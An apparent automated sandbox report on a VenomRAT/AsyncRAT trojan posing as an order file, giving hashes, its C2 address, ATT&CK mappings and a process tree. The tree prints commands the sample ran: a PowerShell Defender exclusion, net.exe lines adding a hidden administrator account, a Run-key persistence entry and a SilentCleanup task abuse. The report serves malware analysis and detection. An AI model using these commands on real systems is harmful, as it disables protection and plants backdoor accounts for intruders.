asyncrat | 70cd7f8c5818b4bbec9b33b3518736bd0627d8e92570c015dd630a461d074262

General

Target

RFQ_ORDER484425083-NJQ.exe
Size

832KB
MD5

9e83077fd628fefd80f9abcdc025e648
SHA1

faaeb0ce7ee4e268b699ebd57d3af36c8c20cee4
SHA256

70cd7f8c5818b4bbec9b33b3518736bd0627d8e92570c015dd630a461d074262
SHA512

943fb244cc8e5fc96fc19e5734ce32803e7f2f1c006eb372336db2fc4b5ac112972f468c24605e004f6d04ed27f035253e7b43fb49ea449140dff87c63b79916

Score

10^/10

asyncrat venom clients evasion persistence rat trojan

Malware Config

Extracted

Family

asyncrat

Version

VenomRAT 5.0.3

Botnet

Venom Clients

C2

194.5.98.120:4449

Mutex

Venom_RAT_Mutex_Venom_RAT

Attributes

anti_vm
false
bsod
false
delay
0
install
false
install_folder
%AppData%
pastebin_config
null

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat
Windows security bypass 2 TTPs
evasion trojan

Disabling Security Tools
T1089

Modify Registry
T1112

Async RAT payload 5 IoCs

rat

Processes:

resource	yara_rule
behavioral1/memory/908-65-0x0000000000400000-0x0000000000416000-memory.dmp	asyncrat
behavioral1/memory/908-64-0x0000000000400000-0x0000000000416000-memory.dmp	asyncrat
behavioral1/memory/908-66-0x0000000000400000-0x0000000000416000-memory.dmp	asyncrat
behavioral1/memory/908-67-0x0000000000400000-0x0000000000416000-memory.dmp	asyncrat
behavioral1/memory/908-71-0x0000000000570000-0x000000000057E000-memory.dmp	asyncrat

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.

Query Registry
T1012

System Information Discovery
T1082

Processes:

RFQ_ORDER484425083-NJQ.exe

description ioc process

Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion RFQ_ORDER484425083-NJQ.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	RFQ_ORDER484425083-NJQ.exe

Windows security modification 2 TTPs 3 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

RFQ_ORDER484425083-NJQ.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	RFQ_ORDER484425083-NJQ.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions	RFQ_ORDER484425083-NJQ.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\RFQ_ORDER484425083-NJQ.exe = "0"	RFQ_ORDER484425083-NJQ.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

RFQ_ORDER484425083-NJQ.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ROCKS = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\RFQ_ORDER484425083-NJQ.exe\""	RFQ_ORDER484425083-NJQ.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

RFQ_ORDER484425083-NJQ.exe

description pid process target process

PID 760 set thread context of 908 760 RFQ_ORDER484425083-NJQ.exe aspnet_compiler.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Runs net.exe

description	pid	process	target process
PID 760 set thread context of 908	760	RFQ_ORDER484425083-NJQ.exe	aspnet_compiler.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

Processes:

RFQ_ORDER484425083-NJQ.exepowershell.exeaspnet_compiler.exe

pid	process
760	RFQ_ORDER484425083-NJQ.exe
760	RFQ_ORDER484425083-NJQ.exe
1468	powershell.exe
760	RFQ_ORDER484425083-NJQ.exe
760	RFQ_ORDER484425083-NJQ.exe
760	RFQ_ORDER484425083-NJQ.exe
760	RFQ_ORDER484425083-NJQ.exe
760	RFQ_ORDER484425083-NJQ.exe
760	RFQ_ORDER484425083-NJQ.exe
760	RFQ_ORDER484425083-NJQ.exe
760	RFQ_ORDER484425083-NJQ.exe
760	RFQ_ORDER484425083-NJQ.exe
760	RFQ_ORDER484425083-NJQ.exe
760	RFQ_ORDER484425083-NJQ.exe
760	RFQ_ORDER484425083-NJQ.exe
760	RFQ_ORDER484425083-NJQ.exe
760	RFQ_ORDER484425083-NJQ.exe
908	aspnet_compiler.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

RFQ_ORDER484425083-NJQ.exepowershell.exeaspnet_compiler.exe

description	pid	process
Token: SeDebugPrivilege	760	RFQ_ORDER484425083-NJQ.exe
Token: SeDebugPrivilege	1468	powershell.exe
Token: SeDebugPrivilege	908	aspnet_compiler.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

aspnet_compiler.exe

pid process

908 aspnet_compiler.exe

pid	process
908	aspnet_compiler.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

RFQ_ORDER484425083-NJQ.exenet.exenet.exenet.exenet.exe

description	pid	process	target process
PID 760 wrote to memory of 1468	760	RFQ_ORDER484425083-NJQ.exe	powershell.exe
PID 760 wrote to memory of 1468	760	RFQ_ORDER484425083-NJQ.exe	powershell.exe
PID 760 wrote to memory of 1468	760	RFQ_ORDER484425083-NJQ.exe	powershell.exe
PID 760 wrote to memory of 1468	760	RFQ_ORDER484425083-NJQ.exe	powershell.exe
PID 760 wrote to memory of 1064	760	RFQ_ORDER484425083-NJQ.exe	net.exe
PID 760 wrote to memory of 1064	760	RFQ_ORDER484425083-NJQ.exe	net.exe
PID 760 wrote to memory of 1064	760	RFQ_ORDER484425083-NJQ.exe	net.exe
PID 760 wrote to memory of 1064	760	RFQ_ORDER484425083-NJQ.exe	net.exe
PID 1064 wrote to memory of 1944	1064	net.exe	net1.exe
PID 1064 wrote to memory of 1944	1064	net.exe	net1.exe
PID 1064 wrote to memory of 1944	1064	net.exe	net1.exe
PID 1064 wrote to memory of 1944	1064	net.exe	net1.exe
PID 760 wrote to memory of 1640	760	RFQ_ORDER484425083-NJQ.exe	net.exe
PID 760 wrote to memory of 1640	760	RFQ_ORDER484425083-NJQ.exe	net.exe
PID 760 wrote to memory of 1640	760	RFQ_ORDER484425083-NJQ.exe	net.exe
PID 760 wrote to memory of 1640	760	RFQ_ORDER484425083-NJQ.exe	net.exe
PID 1640 wrote to memory of 1100	1640	net.exe	net1.exe
PID 1640 wrote to memory of 1100	1640	net.exe	net1.exe
PID 1640 wrote to memory of 1100	1640	net.exe	net1.exe
PID 1640 wrote to memory of 1100	1640	net.exe	net1.exe
PID 760 wrote to memory of 1952	760	RFQ_ORDER484425083-NJQ.exe	net.exe
PID 760 wrote to memory of 1952	760	RFQ_ORDER484425083-NJQ.exe	net.exe
PID 760 wrote to memory of 1952	760	RFQ_ORDER484425083-NJQ.exe	net.exe
PID 760 wrote to memory of 1952	760	RFQ_ORDER484425083-NJQ.exe	net.exe
PID 1952 wrote to memory of 1516	1952	net.exe	net1.exe
PID 1952 wrote to memory of 1516	1952	net.exe	net1.exe
PID 1952 wrote to memory of 1516	1952	net.exe	net1.exe
PID 1952 wrote to memory of 1516	1952	net.exe	net1.exe
PID 760 wrote to memory of 1732	760	RFQ_ORDER484425083-NJQ.exe	net.exe
PID 760 wrote to memory of 1732	760	RFQ_ORDER484425083-NJQ.exe	net.exe
PID 760 wrote to memory of 1732	760	RFQ_ORDER484425083-NJQ.exe	net.exe
PID 760 wrote to memory of 1732	760	RFQ_ORDER484425083-NJQ.exe	net.exe
PID 1732 wrote to memory of 2012	1732	net.exe	net1.exe
PID 1732 wrote to memory of 2012	1732	net.exe	net1.exe
PID 1732 wrote to memory of 2012	1732	net.exe	net1.exe
PID 1732 wrote to memory of 2012	1732	net.exe	net1.exe
PID 760 wrote to memory of 840	760	RFQ_ORDER484425083-NJQ.exe	schtasks.exe
PID 760 wrote to memory of 840	760	RFQ_ORDER484425083-NJQ.exe	schtasks.exe
PID 760 wrote to memory of 840	760	RFQ_ORDER484425083-NJQ.exe	schtasks.exe
PID 760 wrote to memory of 840	760	RFQ_ORDER484425083-NJQ.exe	schtasks.exe
PID 760 wrote to memory of 924	760	RFQ_ORDER484425083-NJQ.exe	Microsoft.Workflow.Compiler.exe
PID 760 wrote to memory of 924	760	RFQ_ORDER484425083-NJQ.exe	Microsoft.Workflow.Compiler.exe
PID 760 wrote to memory of 924	760	RFQ_ORDER484425083-NJQ.exe	Microsoft.Workflow.Compiler.exe
PID 760 wrote to memory of 924	760	RFQ_ORDER484425083-NJQ.exe	Microsoft.Workflow.Compiler.exe
PID 760 wrote to memory of 1912	760	RFQ_ORDER484425083-NJQ.exe	Microsoft.Workflow.Compiler.exe
PID 760 wrote to memory of 1912	760	RFQ_ORDER484425083-NJQ.exe	Microsoft.Workflow.Compiler.exe
PID 760 wrote to memory of 1912	760	RFQ_ORDER484425083-NJQ.exe	Microsoft.Workflow.Compiler.exe
PID 760 wrote to memory of 1912	760	RFQ_ORDER484425083-NJQ.exe	Microsoft.Workflow.Compiler.exe
PID 760 wrote to memory of 1708	760	RFQ_ORDER484425083-NJQ.exe	AddInUtil.exe
PID 760 wrote to memory of 1708	760	RFQ_ORDER484425083-NJQ.exe	AddInUtil.exe
PID 760 wrote to memory of 1708	760	RFQ_ORDER484425083-NJQ.exe	AddInUtil.exe
PID 760 wrote to memory of 1708	760	RFQ_ORDER484425083-NJQ.exe	AddInUtil.exe
PID 760 wrote to memory of 1748	760	RFQ_ORDER484425083-NJQ.exe	AddInUtil.exe
PID 760 wrote to memory of 1748	760	RFQ_ORDER484425083-NJQ.exe	AddInUtil.exe
PID 760 wrote to memory of 1748	760	RFQ_ORDER484425083-NJQ.exe	AddInUtil.exe
PID 760 wrote to memory of 1748	760	RFQ_ORDER484425083-NJQ.exe	AddInUtil.exe
PID 760 wrote to memory of 908	760	RFQ_ORDER484425083-NJQ.exe	aspnet_compiler.exe
PID 760 wrote to memory of 908	760	RFQ_ORDER484425083-NJQ.exe	aspnet_compiler.exe
PID 760 wrote to memory of 908	760	RFQ_ORDER484425083-NJQ.exe	aspnet_compiler.exe
PID 760 wrote to memory of 908	760	RFQ_ORDER484425083-NJQ.exe	aspnet_compiler.exe
PID 760 wrote to memory of 908	760	RFQ_ORDER484425083-NJQ.exe	aspnet_compiler.exe
PID 760 wrote to memory of 908	760	RFQ_ORDER484425083-NJQ.exe	aspnet_compiler.exe
PID 760 wrote to memory of 908	760	RFQ_ORDER484425083-NJQ.exe	aspnet_compiler.exe
PID 760 wrote to memory of 908	760	RFQ_ORDER484425083-NJQ.exe	aspnet_compiler.exe

C:\Users\Admin\AppData\Local\Temp\RFQ_ORDER484425083-NJQ.exe
"C:\Users\Admin\AppData\Local\Temp\RFQ_ORDER484425083-NJQ.exe"
1⤵
- Checks BIOS information in registry
- Windows security modification
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:760

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\RFQ_ORDER484425083-NJQ.exe" -Force
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1468

C:\Windows\SysWOW64\net.exe
"C:\Windows\system32\net.exe" user ADMIN~1 SECRET@1234 /add
2⤵
- Suspicious use of WriteProcessMemory
PID:1064

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user ADMIN~1 SECRET@1234 /add
3⤵
PID:1944

C:\Windows\SysWOW64\net.exe
"C:\Windows\system32\net.exe" localgroup administrators ADMIN~1 /add
2⤵
- Suspicious use of WriteProcessMemory
PID:1640

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup administrators ADMIN~1 /add
3⤵
PID:1100

C:\Windows\SysWOW64\net.exe
"C:\Windows\system32\net.exe" localgroup users "Admin" /add
2⤵
- Suspicious use of WriteProcessMemory
PID:1952

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup users "Admin" /add
3⤵
PID:1516

C:\Windows\SysWOW64\net.exe
"C:\Windows\system32\net.exe" localgroup administrators "Admin" /del
2⤵
- Suspicious use of WriteProcessMemory
PID:1732

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup administrators "Admin" /del
3⤵
PID:2012

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
2⤵
PID:840

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe"
2⤵
PID:924

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe"
2⤵
PID:1912

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInUtil.exe"
2⤵
PID:1708

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInUtil.exe"
2⤵
PID:1748

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:908

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Account Manipulation

1

T1098

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Disabling Security Tools

2

T1089

Modify Registry

3

T1112

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

\??\PIPE\lsarpc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\samr
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/760-54-0x00000000049C0000-0x00000000049C1000-memory.dmp

Filesize
4KB

Download
memory/760-55-0x0000000004420000-0x00000000044C6000-memory.dmp

Filesize
664KB

Download
memory/760-56-0x0000000000360000-0x00000000003B2000-memory.dmp

Filesize
328KB

Download
memory/760-53-0x0000000000F40000-0x0000000001014000-memory.dmp

Filesize
848KB

Download
memory/908-72-0x00000000005D0000-0x00000000005D8000-memory.dmp

Filesize
32KB

Download
memory/908-71-0x0000000000570000-0x000000000057E000-memory.dmp

Filesize
56KB

Download
memory/908-69-0x0000000004830000-0x0000000004831000-memory.dmp

Filesize
4KB

Download
memory/908-62-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/908-63-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/908-65-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/908-64-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/908-66-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/908-67-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/1468-57-0x0000000075D61000-0x0000000075D63000-memory.dmp

Filesize
8KB

Download
memory/1468-60-0x0000000002461000-0x0000000002462000-memory.dmp

Filesize
4KB

Download
memory/1468-61-0x0000000002462000-0x0000000002464000-memory.dmp

Filesize
8KB

Download
memory/1468-59-0x0000000002460000-0x0000000002461000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads